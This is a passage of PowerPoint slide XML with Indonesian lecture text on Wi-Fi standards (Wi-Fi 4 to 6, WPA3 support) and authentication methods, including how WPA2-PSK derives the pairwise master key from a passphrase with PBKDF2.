              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Performa Wi-Fi juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergantung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dukungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 802.11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Generasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbaru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (802.11ax) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dipasarkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi 6. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>retroaktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi 5 (802.11ac) dan Wi-Fi 4 (802.11n). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paralel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>spesifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi 6 dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi 5 dan Wi-Fi 4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seharusnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> WPA3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bawaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maupun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembaruan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> firmware/driver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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200</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="167415308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Metode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Wi-Fi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengamankan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfirmasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhubung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terdiri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tiga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terbuka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kategori</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pra-berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PSK) dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simultan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (SAE).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Dibagikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> pada WPA2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada WPA2, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pra-berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PSK) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>frasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komunikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekelompok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode WPA2-PSK, administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kata </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>antara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 8 dan 63 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> ASCII. Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonversi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> HMAC 256-bit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinyatakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>nilai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>heksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 64 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karakter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peregangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PBKDF2. HMAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>disebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> master </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berpasangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (PMK). Rahasia yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bergabung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. PMK </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
